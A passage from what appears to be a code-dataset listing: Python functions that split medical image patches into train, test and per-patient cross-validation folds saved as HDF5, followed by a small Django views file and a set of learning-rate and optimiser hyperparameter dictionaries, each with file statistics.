hf.create_dataset('patchOverlap', data=patchOverlap)
else:
return [X_train], [y_train], [X_test], [y_test] # embed in a 1-fold list
elif sSplitting == "crossvalidation_data":
if nfolds == 0:
kf = KFold(n_splits=len(np.unique(allPats)))
else:
kf = KFold(n_splits=nfolds)
ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(allPatches):
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])+ '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
elif sSplitting == "crossvalidation_patient":
unique_pats = np.unique(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])+ '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
def fSplitSegmentationDataset(allPatches, allY, allSegmentationMasks, allPats, sSplitting, patchSize, patchOverlap, testTrainingDatasetRatio=0, validationTrainRatio=0, outPutPath=None, nfolds = 0, isRandomShuffle=True):
# TODO: adapt path
iReturn = expecting()
#iReturn = 1000
# 2D or 3D patching?
if len(patchSize) == 2:
#2D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1]:
allPatches = np.transpose(allPatches, (2, 0, 1))
allSegmentationMasks = np.transpose(allSegmentationMasks, (2, 0, 1))
elif len(patchSize) == 3:
#3D patches are used
if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
allPatches = np.transpose(allPatches, (3, 0, 1, 2))
allSegmentationMasks = np.transpose(allSegmentationMasks, (3, 0, 1, 2))
if sSplitting == dlart.DeepLearningArtApp.SIMPLE_RANDOM_SAMPLE_SPLITTING:
# splitting
indexSlices = range(allPatches.shape[0])
if isRandomShuffle:
indexSlices = np.random.permutation(indexSlices)
if len(patchSize)==2:
#2D patching
allPatches = allPatches[indexSlices, :, :]
allSegmentationMasks = allSegmentationMasks[indexSlices, :, :]
elif len(patchSize)==3:
#3D patching
allPatches = allPatches[indexSlices, :, :, :]
allSegmentationMasks = allSegmentationMasks[indexSlices, :, :, :]
shapeAllY = allY.shape
if len(shapeAllY) > 1:
if allY.shape[0] == patchSize[0] and allY.shape[1] == patchSize[1]:
allY = np.transpose(allY, (2, 0, 1))
allY = allY[indexSlices]
#num of samples in test set and validation set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
numSamplesValidation = math.floor(validationTrainRatio*(numAllPatches-numSamplesTest))
if len(patchSize) == 2:
#2D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :]
Y_segMasks_test = allSegmentationMasks[:numSamplesTest, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
Y_segMasks_valid = allSegmentationMasks[numSamplesTest:(numSamplesTest+numSamplesValidation), :, :]
X_train = allPatches[(numSamplesTest+numSamplesValidation):, :, :]
Y_segMasks_train = allSegmentationMasks[(numSamplesTest+numSamplesValidation):, :, :]
elif len(patchSize) == 3:
# 3D patching
# subarrays as no-copy views (array slices)
X_test = allPatches[:numSamplesTest, :, :, :]
Y_segMasks_test = allSegmentationMasks[:numSamplesTest, :, :, :]
X_valid = allPatches[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
Y_segMasks_valid = allSegmentationMasks[numSamplesTest:(numSamplesTest + numSamplesValidation), :, :, :]
X_train = allPatches[(numSamplesTest + numSamplesValidation):, :, :, :]
Y_segMasks_train = allSegmentationMasks[(numSamplesTest + numSamplesValidation):, :, :, :]
y_test = allY[:numSamplesTest]
y_valid = allY[numSamplesTest:(numSamplesTest + numSamplesValidation)]
y_train = allY[(numSamplesTest + numSamplesValidation):]
# #random samples
# nPatches = allPatches.shape[0]
# dVal = math.floor(split_ratio * nPatches)
# rand_num = np.random.permutation(np.arange(nPatches))
# rand_num = rand_num[0:int(dVal)].astype(int)
# print(rand_num)
#
# #do splitting
# X_test = allPatches[rand_num, :, :]
# y_test = allY[rand_num]
# X_train = allPatches
# X_train = np.delete(X_train, rand_num, axis=0)
# y_train = allY
# y_train = np.delete(y_train, rand_num)
# print(X_train.shape)
# print(X_test.shape)
# print(y_train.shape)
# print(y_test.shape)
# #!!!! train dataset is not randomly shuffeled!!!
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'normal_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'normal_' + str(
patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
print(Path)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
# if len(patchSize) == 2:
# # 2D patches are used
# if allPatches.shape[1] == patchSize[0] and allPatches.shape[2] == patchSize[1]:
# X_train = np.transpose(X_train, (1, 2, 0))
# X_valid = np.transpose(X_valid, (1, 2, 0))
# X_test = np.transpose(X_test, (1, 2, 0))
# elif len(patchSize) == 3:
# # 3D patches are used
# if allPatches.shape[0] == patchSize[0] and allPatches.shape[1] == patchSize[1] and allPatches.shape[2] == patchSize[2]:
# X_train = np.transpose(X_train, (1, 2, 3, 0))
# X_valid = np.transpose(X_valid, (1, 2, 3, 0))
# X_test = np.transpose(X_test, (1, 2, 3, 0))
return [X_train], [y_train], [Y_segMasks_train], [X_valid], [y_valid], [Y_segMasks_valid], [X_test], [y_test], [Y_segMasks_test] # embed in a 1-fold list
elif sSplitting == dlart.DeepLearningArtApp.CROSS_VALIDATION_SPLITTING:
# split into test/train sets
#shuffle
indexSlices = range(allPatches.shape[0])
indexSlices = np.random.permutation(indexSlices)
allPatches = allPatches[indexSlices, :, :]
allY = allY[indexSlices]
# num of samples in test set
numAllPatches = allPatches.shape[0]
numSamplesTest = math.floor(testTrainingDatasetRatio*numAllPatches)
# subarrays as no-copy views (array slices)
xTest = allPatches[:numSamplesTest, :, :]
yTest = allY[:numSamplesTest]
xTrain = allPatches[numSamplesTest:, :, :]
yTrain = allY[numSamplesTest:]
# split training dataset into n folds
if nfolds == 0:
kf = KFold(n_splits=len(allPats))
else:
kf = KFold(n_splits=nfolds)
#ind_split = 0
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for train_index, test_index in kf.split(xTrain):
X_train, X_test = xTrain[train_index], xTrain[test_index]
y_train, y_test = yTrain[train_index], yTrain[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal_data' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal_data' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
#ind_split += 1
X_trainFold = np.asarray(X_trainFold)
X_testFold = np.asarray(X_testFold)
y_trainFold = np.asarray(y_trainFold)
y_testFold = np.asarray(y_testFold)
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold, xTest, yTest
elif sSplitting == dlart.DeepLearningArtApp.PATIENT_CROSS_VALIDATION_SPLITTING:
unique_pats = len(allPats)
X_trainFold = []
X_testFold = []
y_trainFold = []
y_testFold = []
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
X_train, X_test = allPatches[train_index], allPatches[test_index]
y_train, y_test = allY[train_index], allY[test_index]
if iReturn == 0:
if len(patchSize) == 3:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(patchSize[2])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + str(
patchSize[2]) + os.sep + 'crossVal' + str(ind_split) + '_' + str(patchSize[0]) + str(
patchSize[1]) + str(patchSize[2]) + '.h5'
else:
folder = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1])
Path = sFolder + os.sep + str(patchSize[0]) + str(patchSize[1]) + os.sep + 'crossVal' + str(
ind_split) + '_' + str(patchSize[0]) + str(patchSize[1]) + '.h5'
if os.path.isdir(folder):
pass
else:
os.makedirs(folder)
with h5py.File(Path, 'w') as hf:
hf.create_dataset('X_train', data=X_train)
hf.create_dataset('X_test', data=X_test)
hf.create_dataset('y_train', data=y_train)
hf.create_dataset('y_test', data=y_test)
hf.create_dataset('patchSize', data=patchSize)
hf.create_dataset('patchOverlap', data=patchOverlap)
else:
X_trainFold.append(X_train)
X_testFold.append(X_test)
y_trainFold.append(y_train)
y_testFold.append(y_test)
X_trainFold = np.asarray(X_trainFold, dtype='f')
X_testFold = np.asarray(X_testFold, dtype='f')
y_trainFold = np.asarray(y_trainFold, dtype='f')
y_testFold = np.asarray(y_testFold, dtype='f')
if iReturn > 0:
return X_trainFold, y_trainFold, X_testFold, y_testFold
def fSplitDatasetCorrection(sSplitting, dRefPatches, dArtPatches, allPats, split_ratio, nfolds, test_index):
"""
Split dataset with three options:
1. normal: randomly split data according to the split_ratio without cross validation
2. crossvalidation_data: perform crossvalidation with mixed patient data
3. crossvalidation_patient: perform crossvalidation with separate patient data
@param sSplitting: splitting mode 'normal', 'crossvalidation_data' or 'crossvalidation_patient'
@param dRefPatches: reference patches
@param dArtPatches: artifact patches
@param allPats: patient index
@param split_ratio: the ratio to split test data
@param nfolds: folds for cross validation
@return: testing and training data for both reference and artifact images
"""
train_ref_fold = []
test_ref_fold = []
train_art_fold = []
test_art_fold = []
# normal splitting
if sSplitting == 'normal':
nPatches = dRefPatches.shape[0]
dVal = math.floor(split_ratio * nPatches)
rand_num = np.random.permutation(np.arange(nPatches))
rand_num = rand_num[0:int(dVal)].astype(int)
test_ref_fold.append(dRefPatches[rand_num, :, :])
train_ref_fold.append(np.delete(dRefPatches, rand_num, axis=0))
test_art_fold.append(dArtPatches[rand_num, :, :])
train_art_fold.append(np.delete(dArtPatches, rand_num, axis=0))
# crossvalidation with mixed patient
if sSplitting == "crossvalidation_data":
if nfolds == 0:
kf = KFold(n_splits=len(np.unique(allPats)))
else:
kf = KFold(n_splits=nfolds)
for train_index, test_index in kf.split(dRefPatches):
train_ref, test_ref = dRefPatches[train_index], dRefPatches[test_index]
train_art, test_art = dArtPatches[train_index], dArtPatches[test_index]
train_ref_fold.append(train_ref)
train_art_fold.append(train_art)
test_ref_fold.append(test_ref)
test_art_fold.append(test_art)
# crossvalidation with separate patient
elif sSplitting == 'crossvalidation_patient':
if test_index == -1:
unique_pats = np.unique(allPats)
else:
unique_pats = [test_index]
for ind_split in unique_pats:
train_index = np.where(allPats != ind_split)[0]
test_index = np.where(allPats == ind_split)[0]
train_ref, test_ref = dRefPatches[train_index], dRefPatches[test_index]
train_art, test_art = dArtPatches[train_index], dArtPatches[test_index]
train_ref_fold.append(train_ref)
train_art_fold.append(train_art)
test_ref_fold.append(test_ref)
test_art_fold.append(test_art)
train_ref_fold = np.asarray(train_ref_fold, dtype='f')
train_art_fold = np.asarray(train_art_fold, dtype='f')
test_ref_fold = np.asarray(test_ref_fold, dtype='f')
test_art_fold = np.asarray(test_art_fold, dtype='f')
return train_ref_fold, test_ref_fold, train_art_fold, test_art_fold
| 43.207895 | 220 | 0.570437 | 3,762 | 32,838 | 4.800372 | 0.057416 | 0.087713 | 0.038873 | 0.047843 | 0.895454 | 0.889473 | 0.888421 | 0.883991 | 0.882275 | 0.882275 | 0 | 0.018403 | 0.309976 | 32,838 | 759 | 221 | 43.264822 | 0.778587 | 0.127657 | 0 | 0.844488 | 0 | 0 | 0.028324 | 0.001617 | 0 | 0 | 0 | 0.001318 | 0 | 1 | 0.007874 | false | 0.017717 | 0.017717 | 0 | 0.051181 | 0.009843 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
62e8c6282d9cd7b929f699748f336d5ff1e0f6ff | 205 | py | Python | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | null | null | null | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | null | null | null | pages/views.py | mahanfarzaneh2000/Freelara | 803cd0e75c5c03ee23ed6dea5202f3e6a7af4864 | [
"Apache-2.0"
] | 1 | 2021-04-11T09:59:54.000Z | 2021-04-11T09:59:54.000Z | from django.shortcuts import render
# Create your views here.
def index_view(request):
return render(request,'pages/index.html')
def about_view(request):
return render(request,'pages/about.html') | 25.625 | 45 | 0.760976 | 29 | 205 | 5.310345 | 0.586207 | 0.142857 | 0.220779 | 0.298701 | 0.454545 | 0.454545 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126829 | 205 | 8 | 46 | 25.625 | 0.860335 | 0.112195 | 0 | 0 | 0 | 0 | 0.176796 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
1a21ac066b34d35321cec45406243f71325063b3 | 2,823 | py | Python | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp.py | Tommy-Liu/MovieQA_Contest | 4281bf4a731aa14a0d19f18adda31d59a4a297cb | [
"MIT"
] | null | null | null | hp01 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 64,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp02 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 128,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp03 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 256,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp04 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 512,
'opt': 'powersign-ld',
'reg': 0.01,
'loss': 'sparse_softmax',
}
hp05 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 4,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp06 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 4,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp07 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 8,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp08 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 8,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp09 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 2,
'opt': 'addsign-ld',
'reg': 0.1,
'loss': 'sparse_softmax',
}
hp10 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 2,
'opt': 'powersign-ld',
'reg': 0.1,
'loss': 'sparse_softmax',
}
hp11 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 3,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp12 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 3,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp13 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1.5,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp14 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1.5,
'opt': 'addsign-ld',
'reg': 0.1,
}
hp15 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1,
'opt': 'powersign-ld',
'reg': 0.1,
}
hp16 = {
'learning_rate': 10 ** (-3),
'decay_rate': 0.88,
'decay_type': 'linear_cos',
'decay_epoch': 1,
'opt': 'addsign-ld',
'reg': 0.1,
}
| 20.911111 | 32 | 0.514701 | 372 | 2,823 | 3.674731 | 0.120968 | 0.140454 | 0.163862 | 0.175567 | 0.945135 | 0.945135 | 0.823702 | 0.788588 | 0.788588 | 0.680322 | 0 | 0.089362 | 0.250797 | 2,823 | 134 | 33 | 21.067164 | 0.556974 | 0 | 0 | 0.731343 | 0 | 0 | 0.442083 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.